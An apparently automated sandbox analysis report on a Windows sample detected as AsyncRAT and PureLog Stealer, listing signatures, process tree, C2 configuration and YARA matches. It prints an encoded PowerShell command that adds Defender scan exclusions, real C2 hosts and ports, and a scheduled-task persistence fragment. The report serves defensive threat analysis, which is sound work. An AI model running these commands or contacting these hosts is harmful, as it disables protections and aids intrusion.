Edit tour

Windows Analysis Report
KMj8h32vWy.exe

Overview

General Information

Sample name:	KMj8h32vWy.exe renamed because original name is a hash value
Original sample name:	2AD3527444357F19CD120FA1B8BD2F23.exe
Analysis ID:	1431468
MD5:	2ad3527444357f19cd120fa1b8bd2f23
SHA1:	ac986ab9967bc084565ed13aa9434eafcc6d4752
SHA256:	dedc15a14da607a8c993e869ab600a5be154e1853c45e0493727244e627cb2a9
Tags:	AsyncRATexeRAT
Infos:

Detection

AsyncRAT, PureLog Stealer

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Antivirus detection for dropped file

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Snort IDS alert for network traffic

Yara detected AntiVM3

Yara detected AsyncRAT

Yara detected PureLog Stealer

.NET source code contains potential unpacker

Allocates memory in foreign processes

C2 URLs / IPs found in malware configuration

Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)

Creates files with lurking names (e.g. Crack.exe)

Encrypted powershell cmdline option found

Injects a PE file into a foreign processes

Loading BitLocker PowerShell Module

Machine Learning detection for dropped file

Machine Learning detection for sample

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Writes to foreign memory regions

Yara detected Costura Assembly Loader

Yara detected Generic Downloader

Allocates memory with a write watch (potentially for evading sandboxes)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Checks if the current process is being debugged

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Dropped file seen in connection with other malware

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE file contains executable resources (Code or Archives)

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Sigma detected: CurrentVersion Autorun Keys Modification

Sigma detected: Suspicious Execution of Powershell with Base64

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Yara signature match

Classification

Process Tree

System is w10x64

KMj8h32vWy.exe (PID: 7280 cmdline: "C:\Users\user\Desktop\KMj8h32vWy.exe" MD5: 2AD3527444357F19CD120FA1B8BD2F23)

powershell.exe (PID: 7328 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG0AeQBpACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAZABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGcAZABwACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHgAegB0ACMAPgA=" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 7336 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WmiPrvSE.exe (PID: 7588 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)

Hzoynygqzv.exe (PID: 7416 cmdline: "C:\Users\user\AppData\Local\Hzoynygqzv.exe" MD5: A6894B09A24E7F7AAE0B17614279BE90)

InstallUtil.exe (PID: 7556 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe" MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)

IDM_6.4x_Crack_v18.1.exe (PID: 7448 cmdline: "C:\Users\user\AppData\Local\IDM_6.4x_Crack_v18.1.exe" MD5: DCDC109069B6E0D80D776C143FECDE3F)

Ouopxupnarf.exe (PID: 7760 cmdline: "C:\Users\user\AppData\Roaming\Ouopxupnarf.exe" MD5: A6894B09A24E7F7AAE0B17614279BE90)

InstallUtil.exe (PID: 7852 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe" MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)

Ouopxupnarf.exe (PID: 7984 cmdline: "C:\Users\user\AppData\Roaming\Ouopxupnarf.exe" MD5: A6894B09A24E7F7AAE0B17614279BE90)

InstallUtil.exe (PID: 8040 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe" MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
AsyncRAT	AsyncRAT is a Remote Access Tool (RAT) designed to remotely monitor and control other computers through a secure encrypted connection. It is an open source remote administration tool, however, it could also be used maliciously because it provides functionality such as keylogger, remote desktop control, and many other functions that may cause harm to the victims computer. In addition, AsyncRAT can be delivered via various methods such as spear-phishing, malvertising, exploit kit and other techniques.	No Attribution	https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/asyncrat-onenote-dropper https://aidenmitchell.ca/asyncrat-via-vbs/ https://assets.virustotal.com/reports/2021trends.pdf https://axmahr.github.io/posts/asyncrat-detection/ https://blog.checkpoint.com/research/november-2023s-most-wanted-malware-new-asyncrat-campaign-discovered-while-fakeupdates-re-entered-the-top-ten-after-brief-hiatus/	https://malpedia.caad.fkie.fraunhofer.de/details/win.asyncrat

Malware Configuration

Threatname: AsyncRAT

{"Server": "tomx.brasilia.me,91.92.253.249", "Port": "6606,7707,8808", "Version": "0.5.8", "MutexName": "vWKJAJDsDf09", "Autorun": "false", "Group": "null"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
dump.pcap	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x43e:$x1: AsyncRAT 0x47c:$x1: AsyncRAT

Memory Dumps

Source	Rule	Description	Author	Strings
00000009.00000002.1852689671.0000000005126000.00000004.00000020.00020000.00000000.sdmp	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0xcf0b:$x1: AsyncRAT 0xcf49:$x1: AsyncRAT
00000005.00000002.2894655463.00000000025B1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
00000005.00000002.2894655463.00000000025B1000.00000004.00000800.00020000.00000000.sdmp	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x2b6f7:$x1: AsyncRAT 0x2b735:$x1: AsyncRAT
00000005.00000002.2892516704.0000000000B4F000.00000004.00000020.00020000.00000000.sdmp	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0xdb:$x1: AsyncRAT 0x119:$x1: AsyncRAT 0x4dff:$x1: AsyncRAT 0x4e3d:$x1: AsyncRAT
0000000A.00000002.1869559320.0000000002EEE000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
0000000B.00000002.1909891753.0000000000FD5000.00000004.00000020.00020000.00000000.sdmp	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x36c43:$x1: AsyncRAT 0x36c81:$x1: AsyncRAT
00000009.00000002.1843584500.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
00000009.00000002.1843584500.0000000000402000.00000040.00000400.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse	Detects file containing reversed ASEP Autorun registry keys	ditekSHen	0x97b5:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM
00000005.00000002.2890976907.0000000000AF7000.00000004.00000020.00020000.00000000.sdmp	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x3a5db:$x1: AsyncRAT 0x3a619:$x1: AsyncRAT
00000003.00000002.1654293004.0000000005570000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0000000A.00000002.1879701013.0000000003FEA000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000007.00000002.1805104418.0000000003320000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000003.00000002.1656376036.0000000005950000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000007.00000002.1814061192.00000000043BA000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000003.00000002.1645792371.00000000030EF000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
00000003.00000002.1645792371.00000000030EF000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Asyncrat_11a11ba1	unknown	unknown	0x7bbf:$a1: /c schtasks /create /f /sc onlogon /rl highest /tn " 0x19d97:$a1: /c schtasks /create /f /sc onlogon /rl highest /tn " 0x2d91f:$a1: /c schtasks /create /f /sc onlogon /rl highest /tn " 0x8ed4:$a2: Stub.exe 0x8f64:$a2: Stub.exe 0x1b0ac:$a2: Stub.exe 0x1b13c:$a2: Stub.exe 0x2ec50:$a2: Stub.exe 0x2ece0:$a2: Stub.exe 0xc99b:$a3: get_ActivatePong 0x16b73:$a3: get_ActivatePong 0x2a6fb:$a3: get_ActivatePong 0x7dd7:$a4: vmware 0x19faf:$a4: vmware 0x2db37:$a4: vmware 0x7c4f:$a5: \nuR\noisreVtnerruC\swodniW\tfosorciM\erawtfoS 0x19e27:$a5: \nuR\noisreVtnerruC\swodniW\tfosorciM\erawtfoS 0x2d9af:$a5: \nuR\noisreVtnerruC\swodniW\tfosorciM\erawtfoS 0xd6f6:$a6: get_SslClient 0x178ce:$a6: get_SslClient 0x2b456:$a6: get_SslClient
00000003.00000002.1645792371.00000000030EF000.00000004.00000800.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse	Detects file containing reversed ASEP Autorun registry keys	ditekSHen	0x7c51:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM 0x19e29:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM 0x2d9b1:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM
00000007.00000002.1805104418.00000000034B5000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
00000007.00000002.1805104418.00000000034B5000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Asyncrat_11a11ba1	unknown	unknown	0x746f:$a1: /c schtasks /create /f /sc onlogon /rl highest /tn " 0x19647:$a1: /c schtasks /create /f /sc onlogon /rl highest /tn " 0x2d1d3:$a1: /c schtasks /create /f /sc onlogon /rl highest /tn " 0x8784:$a2: Stub.exe 0x8814:$a2: Stub.exe 0x1a95c:$a2: Stub.exe 0x1a9ec:$a2: Stub.exe 0x2e504:$a2: Stub.exe 0x2e594:$a2: Stub.exe 0xc24b:$a3: get_ActivatePong 0x16423:$a3: get_ActivatePong 0x29faf:$a3: get_ActivatePong 0x7687:$a4: vmware 0x1985f:$a4: vmware 0x2d3eb:$a4: vmware 0x74ff:$a5: \nuR\noisreVtnerruC\swodniW\tfosorciM\erawtfoS 0x196d7:$a5: \nuR\noisreVtnerruC\swodniW\tfosorciM\erawtfoS 0x2d263:$a5: \nuR\noisreVtnerruC\swodniW\tfosorciM\erawtfoS 0xcfa6:$a6: get_SslClient 0x1717e:$a6: get_SslClient 0x2ad0a:$a6: get_SslClient
00000007.00000002.1805104418.00000000034B5000.00000004.00000800.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse	Detects file containing reversed ASEP Autorun registry keys	ditekSHen	0x7501:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM 0x196d9:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM 0x2d265:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM
00000003.00000002.1645792371.0000000002E8E000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000007.00000002.1805104418.00000000032BE000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
0000000B.00000002.1911540442.0000000002C9C000.00000004.00000800.00020000.00000000.sdmp	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x12a5b:$x1: AsyncRAT 0x12a99:$x1: AsyncRAT
0000000A.00000002.1869559320.0000000003142000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
0000000A.00000002.1869559320.0000000003142000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Asyncrat_11a11ba1	unknown	unknown	0x7afb:$a1: /c schtasks /create /f /sc onlogon /rl highest /tn " 0x19cd3:$a1: /c schtasks /create /f /sc onlogon /rl highest /tn " 0x2d85f:$a1: /c schtasks /create /f /sc onlogon /rl highest /tn " 0x8e10:$a2: Stub.exe 0x8ea0:$a2: Stub.exe 0x1afe8:$a2: Stub.exe 0x1b078:$a2: Stub.exe 0x2eb9c:$a2: Stub.exe 0x2ec2c:$a2: Stub.exe 0xc8d7:$a3: get_ActivatePong 0x16aaf:$a3: get_ActivatePong 0x2a63b:$a3: get_ActivatePong 0x7d13:$a4: vmware 0x19eeb:$a4: vmware 0x2da77:$a4: vmware 0x7b8b:$a5: \nuR\noisreVtnerruC\swodniW\tfosorciM\erawtfoS 0x19d63:$a5: \nuR\noisreVtnerruC\swodniW\tfosorciM\erawtfoS 0x2d8ef:$a5: \nuR\noisreVtnerruC\swodniW\tfosorciM\erawtfoS 0xd632:$a6: get_SslClient 0x1780a:$a6: get_SslClient 0x2b396:$a6: get_SslClient
0000000A.00000002.1869559320.0000000003142000.00000004.00000800.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse	Detects file containing reversed ASEP Autorun registry keys	ditekSHen	0x7b8d:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM 0x19d65:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM 0x2d8f1:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM
00000009.00000002.1845196723.0000000002BB1000.00000004.00000800.00020000.00000000.sdmp	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x1da5b:$x1: AsyncRAT 0x1da99:$x1: AsyncRAT
Process Memory Space: Hzoynygqzv.exe PID: 7416	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
Process Memory Space: Hzoynygqzv.exe PID: 7416	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
Process Memory Space: Hzoynygqzv.exe PID: 7416	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: Hzoynygqzv.exe PID: 7416	INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse	Detects file containing reversed ASEP Autorun registry keys	ditekSHen	0x163d9b:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM
Process Memory Space: InstallUtil.exe PID: 7556	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
Process Memory Space: InstallUtil.exe PID: 7556	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x26b5d:$x1: AsyncRAT 0x26b8f:$x1: AsyncRAT 0x26bb5:$x1: AsyncRAT 0x2b774:$x1: AsyncRAT 0x2b7a6:$x1: AsyncRAT 0x34134:$x1: AsyncRAT 0x34166:$x1: AsyncRAT 0x1461:$s8: Win32_ComputerSystem 0x14e3:$s8: Win32_ComputerSystem
Process Memory Space: Ouopxupnarf.exe PID: 7760	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
Process Memory Space: Ouopxupnarf.exe PID: 7760	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
Process Memory Space: Ouopxupnarf.exe PID: 7760	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: Ouopxupnarf.exe PID: 7760	INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse	Detects file containing reversed ASEP Autorun registry keys	ditekSHen	0x737c6:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM
Process Memory Space: InstallUtil.exe PID: 7852	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
Process Memory Space: InstallUtil.exe PID: 7852	INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse	Detects file containing reversed ASEP Autorun registry keys	ditekSHen	0xf962:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM
Process Memory Space: InstallUtil.exe PID: 7852	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x7739:$x1: AsyncRAT 0x776b:$x1: AsyncRAT 0x18d1d:$x1: AsyncRAT 0x18d4f:$x1: AsyncRAT 0xfa28:$s6: VirtualBox 0xf9db:$s8: Win32_ComputerSystem
Process Memory Space: Ouopxupnarf.exe PID: 7984	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
Process Memory Space: Ouopxupnarf.exe PID: 7984	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
Process Memory Space: Ouopxupnarf.exe PID: 7984	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: Ouopxupnarf.exe PID: 7984	INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse	Detects file containing reversed ASEP Autorun registry keys	ditekSHen	0x51dbb:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM
Process Memory Space: InstallUtil.exe PID: 8040	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x2c88:$x1: AsyncRAT 0x2cba:$x1: AsyncRAT 0x22da7:$x1: AsyncRAT 0x22dd9:$x1: AsyncRAT
Click to see the 40 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
10.2.Ouopxupnarf.exe.40039d8.4.raw.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
7.2.Ouopxupnarf.exe.34c4d24.1.unpack	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
7.2.Ouopxupnarf.exe.34c4d24.1.unpack	Windows_Trojan_Asyncrat_11a11ba1	unknown	unknown	0x7b23:$a1: /c schtasks /create /f /sc onlogon /rl highest /tn " 0x8e38:$a2: Stub.exe 0x8ec8:$a2: Stub.exe 0x48ff:$a3: get_ActivatePong 0x7d3b:$a4: vmware 0x7bb3:$a5: \nuR\noisreVtnerruC\swodniW\tfosorciM\erawtfoS 0x565a:$a6: get_SslClient
7.2.Ouopxupnarf.exe.34c4d24.1.unpack	INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse	Detects file containing reversed ASEP Autorun registry keys	ditekSHen	0x7bb5:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM
10.2.Ouopxupnarf.exe.2f65008.0.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
3.2.Hzoynygqzv.exe.2f092e4.1.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
3.2.Hzoynygqzv.exe.30ff474.3.unpack	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
3.2.Hzoynygqzv.exe.30ff474.3.unpack	Windows_Trojan_Asyncrat_11a11ba1	unknown	unknown	0x7b23:$a1: /c schtasks /create /f /sc onlogon /rl highest /tn " 0x8e38:$a2: Stub.exe 0x8ec8:$a2: Stub.exe 0x48ff:$a3: get_ActivatePong 0x7d3b:$a4: vmware 0x7bb3:$a5: \nuR\noisreVtnerruC\swodniW\tfosorciM\erawtfoS 0x565a:$a6: get_SslClient
3.2.Hzoynygqzv.exe.30ff474.3.unpack	INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse	Detects file containing reversed ASEP Autorun registry keys	ditekSHen	0x7bb5:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM
7.2.Ouopxupnarf.exe.34c4d24.1.raw.unpack	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
7.2.Ouopxupnarf.exe.34c4d24.1.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
7.2.Ouopxupnarf.exe.34c4d24.1.raw.unpack	Windows_Trojan_Asyncrat_11a11ba1	unknown	unknown	0x9923:$a1: /c schtasks /create /f /sc onlogon /rl highest /tn " 0x1d4af:$a1: /c schtasks /create /f /sc onlogon /rl highest /tn " 0xac38:$a2: Stub.exe 0xacc8:$a2: Stub.exe 0x1e7e0:$a2: Stub.exe 0x1e870:$a2: Stub.exe 0x66ff:$a3: get_ActivatePong 0x1a28b:$a3: get_ActivatePong 0x9b3b:$a4: vmware 0x1d6c7:$a4: vmware 0x99b3:$a5: \nuR\noisreVtnerruC\swodniW\tfosorciM\erawtfoS 0x1d53f:$a5: \nuR\noisreVtnerruC\swodniW\tfosorciM\erawtfoS 0x745a:$a6: get_SslClient 0x1afe6:$a6: get_SslClient
7.2.Ouopxupnarf.exe.34c4d24.1.raw.unpack	INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse	Detects file containing reversed ASEP Autorun registry keys	ditekSHen	0x99b5:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM 0x1d541:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM
10.2.Ouopxupnarf.exe.2f65008.0.raw.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
3.2.Hzoynygqzv.exe.30b1758.2.unpack	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
3.2.Hzoynygqzv.exe.30b1758.2.unpack	Windows_Trojan_Asyncrat_11a11ba1	unknown	unknown	0x43667:$a1: /c schtasks /create /f /sc onlogon /rl highest /tn " 0x4497c:$a2: Stub.exe 0x44a0c:$a2: Stub.exe 0x48443:$a3: get_ActivatePong 0x4387f:$a4: vmware 0x436f7:$a5: \nuR\noisreVtnerruC\swodniW\tfosorciM\erawtfoS 0x4919e:$a6: get_SslClient
3.2.Hzoynygqzv.exe.30b1758.2.unpack	INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse	Detects file containing reversed ASEP Autorun registry keys	ditekSHen	0x436f9:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM
3.2.Hzoynygqzv.exe.5950000.12.raw.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
7.2.Ouopxupnarf.exe.347dcf0.0.unpack	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
7.2.Ouopxupnarf.exe.347dcf0.0.unpack	Windows_Trojan_Asyncrat_11a11ba1	unknown	unknown	0x3c97f:$a1: /c schtasks /create /f /sc onlogon /rl highest /tn " 0x3dc94:$a2: Stub.exe 0x3dd24:$a2: Stub.exe 0x4175b:$a3: get_ActivatePong 0x4b933:$a3: get_ActivatePong 0x3cb97:$a4: vmware 0x3ca0f:$a5: \nuR\noisreVtnerruC\swodniW\tfosorciM\erawtfoS 0x424b6:$a6: get_SslClient 0x4c68e:$a6: get_SslClient
7.2.Ouopxupnarf.exe.347dcf0.0.unpack	INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse	Detects file containing reversed ASEP Autorun registry keys	ditekSHen	0x3ca11:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM
9.2.InstallUtil.exe.400000.0.unpack	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
9.2.InstallUtil.exe.400000.0.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
9.2.InstallUtil.exe.400000.0.unpack	Windows_Trojan_Asyncrat_11a11ba1	unknown	unknown	0x9923:$a1: /c schtasks /create /f /sc onlogon /rl highest /tn " 0xac38:$a2: Stub.exe 0xacc8:$a2: Stub.exe 0x66ff:$a3: get_ActivatePong 0x9b3b:$a4: vmware 0x99b3:$a5: \nuR\noisreVtnerruC\swodniW\tfosorciM\erawtfoS 0x745a:$a6: get_SslClient
9.2.InstallUtil.exe.400000.0.unpack	INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse	Detects file containing reversed ASEP Autorun registry keys	ditekSHen	0x99b5:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM
3.2.Hzoynygqzv.exe.30ff474.3.raw.unpack	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
3.2.Hzoynygqzv.exe.30ff474.3.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
3.2.Hzoynygqzv.exe.30ff474.3.raw.unpack	Windows_Trojan_Asyncrat_11a11ba1	unknown	unknown	0x9923:$a1: /c schtasks /create /f /sc onlogon /rl highest /tn " 0x1d4ab:$a1: /c schtasks /create /f /sc onlogon /rl highest /tn " 0xac38:$a2: Stub.exe 0xacc8:$a2: Stub.exe 0x1e7dc:$a2: Stub.exe 0x1e86c:$a2: Stub.exe 0x66ff:$a3: get_ActivatePong 0x1a287:$a3: get_ActivatePong 0x9b3b:$a4: vmware 0x1d6c3:$a4: vmware 0x99b3:$a5: \nuR\noisreVtnerruC\swodniW\tfosorciM\erawtfoS 0x1d53b:$a5: \nuR\noisreVtnerruC\swodniW\tfosorciM\erawtfoS 0x745a:$a6: get_SslClient 0x1afe2:$a6: get_SslClient
3.2.Hzoynygqzv.exe.30ff474.3.raw.unpack	INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse	Detects file containing reversed ASEP Autorun registry keys	ditekSHen	0x99b5:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM 0x1d53d:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM
10.2.Ouopxupnarf.exe.31523b0.1.unpack	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
10.2.Ouopxupnarf.exe.31523b0.1.unpack	Windows_Trojan_Asyncrat_11a11ba1	unknown	unknown	0x7b23:$a1: /c schtasks /create /f /sc onlogon /rl highest /tn " 0x8e38:$a2: Stub.exe 0x8ec8:$a2: Stub.exe 0x48ff:$a3: get_ActivatePong 0x7d3b:$a4: vmware 0x7bb3:$a5: \nuR\noisreVtnerruC\swodniW\tfosorciM\erawtfoS 0x565a:$a6: get_SslClient
10.2.Ouopxupnarf.exe.31523b0.1.unpack	INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse	Detects file containing reversed ASEP Autorun registry keys	ditekSHen	0x7bb5:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM
10.2.Ouopxupnarf.exe.310b37c.2.unpack	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
10.2.Ouopxupnarf.exe.310b37c.2.unpack	Windows_Trojan_Asyncrat_11a11ba1	unknown	unknown	0x3c97f:$a1: /c schtasks /create /f /sc onlogon /rl highest /tn " 0x3dc94:$a2: Stub.exe 0x3dd24:$a2: Stub.exe 0x4175b:$a3: get_ActivatePong 0x4b933:$a3: get_ActivatePong 0x3cb97:$a4: vmware 0x3ca0f:$a5: \nuR\noisreVtnerruC\swodniW\tfosorciM\erawtfoS 0x424b6:$a6: get_SslClient 0x4c68e:$a6: get_SslClient
10.2.Ouopxupnarf.exe.310b37c.2.unpack	INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse	Detects file containing reversed ASEP Autorun registry keys	ditekSHen	0x3ca11:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM
3.2.Hzoynygqzv.exe.2f092e4.1.raw.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
10.2.Ouopxupnarf.exe.31523b0.1.raw.unpack	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
10.2.Ouopxupnarf.exe.31523b0.1.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
10.2.Ouopxupnarf.exe.31523b0.1.raw.unpack	Windows_Trojan_Asyncrat_11a11ba1	unknown	unknown	0x9923:$a1: /c schtasks /create /f /sc onlogon /rl highest /tn " 0x1d4af:$a1: /c schtasks /create /f /sc onlogon /rl highest /tn " 0xac38:$a2: Stub.exe 0xacc8:$a2: Stub.exe 0x1e7ec:$a2: Stub.exe 0x1e87c:$a2: Stub.exe 0x66ff:$a3: get_ActivatePong 0x1a28b:$a3: get_ActivatePong 0x9b3b:$a4: vmware 0x1d6c7:$a4: vmware 0x99b3:$a5: \nuR\noisreVtnerruC\swodniW\tfosorciM\erawtfoS 0x1d53f:$a5: \nuR\noisreVtnerruC\swodniW\tfosorciM\erawtfoS 0x745a:$a6: get_SslClient 0x1afe6:$a6: get_SslClient
10.2.Ouopxupnarf.exe.31523b0.1.raw.unpack	INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse	Detects file containing reversed ASEP Autorun registry keys	ditekSHen	0x99b5:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM 0x1d541:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM
